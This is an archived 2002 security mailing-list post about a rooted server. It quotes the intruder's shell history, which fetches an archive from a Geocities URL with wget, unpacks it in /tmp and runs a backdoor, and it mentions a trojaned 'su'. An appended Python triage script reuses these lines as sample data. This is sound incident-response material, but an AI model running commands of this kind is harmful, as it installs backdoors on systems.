Re: Rooted, .haos on system

From: Damian Gerow (damianat_private)
Date: Mon Dec 16 2002 - 10:47:28 PST

    On Mon, 2002-12-16 at 12:38, Damian Gerow wrote:
    > On Thu, 2002-12-12 at 18:50, Damian Gerow wrote:
    > > I've just received word that one of our customers was rooted, and he's asking about the file ".haos".  Nothing rings any bells, has anyone heard of it?
    > 
    > Just a quick update to this...
    
    And one last tidbit...
    
    Left in the .bash_history was this:
    
            w
            cd /tmp
            wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
            ./epc
    
    A quick check tells me that 'epc' is a backdoor utility, and the other
    file contained within loc.tgz looks like a trojaned 'su'.
    
    I've already notified Geocities abuse, and haven't heard back from them
    yet.
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
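    As an added illustration (not part of the original message or list), the kind of triage a responder would run over a recovered .bash_history like the one above: it walks the history, follows 'cd' to know where commands ran, and flags any './binary' executed after a download, recording the fetched URL, the unpacked archive and whether it happened in a staging directory such as /tmp. The sample history below is constructed, seeded with the lines quoted in the post.

```python
import re

# Constructed sample history, seeded with the lines quoted in the post.
SAMPLE_HISTORY = """\
ls -la
w
cd /tmp
wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
./epc
cd ~
vim notes.txt
"""

DOWNLOADERS = {"wget", "curl", "fetch", "ftp", "lynx"}
ARCHIVE_SUFFIXES = (".tgz", ".tar.gz", ".tar", ".tar.bz2", ".zip")
STAGING_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
# Separators that chain several commands on one history line.
CHAIN_RE = re.compile(r"\s*(?:;|&&|\|\|)\s*")


def triage_history(history: str) -> list:
    """Flag every './binary' run after a download, with its supporting chain.

    Tracks the working directory through 'cd' so each finding records whether
    the execution happened in a world-writable staging directory like /tmp.
    """
    findings, cwd, downloads, archives = [], None, [], []
    for line_no, line in enumerate(history.splitlines(), start=1):
        for cmd in CHAIN_RE.split(line.strip()):
            tokens = cmd.split()
            if not tokens:
                continue
            if tokens[0] == "cd":
                cwd = tokens[1] if len(tokens) > 1 else "~"
            elif tokens[0] in DOWNLOADERS:
                # First non-option argument is the URL/host that was fetched.
                downloads += [t for t in tokens[1:] if not t.startswith("-")][:1]
            elif tokens[0] == "tar":
                archives += [t for t in tokens[1:] if t.endswith(ARCHIVE_SUFFIXES)]
            elif tokens[0].startswith("./") and downloads:
                findings.append({
                    "line": line_no,
                    "binary": tokens[0][2:],
                    "cwd": cwd,
                    "in_staging_dir": bool(cwd) and cwd.startswith(STAGING_DIRS),
                    "downloads": list(downloads),
                    "archives": list(archives),
                })
    return findings
```

Run against the sample it reports one finding: 'epc' executed on line 5 from /tmp, after fetching loc.tgz from the Geocities URL and unpacking it.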

    This archive was generated by hypermail 2b30 : Wed Dec 18 2002 - 17:46:24 PST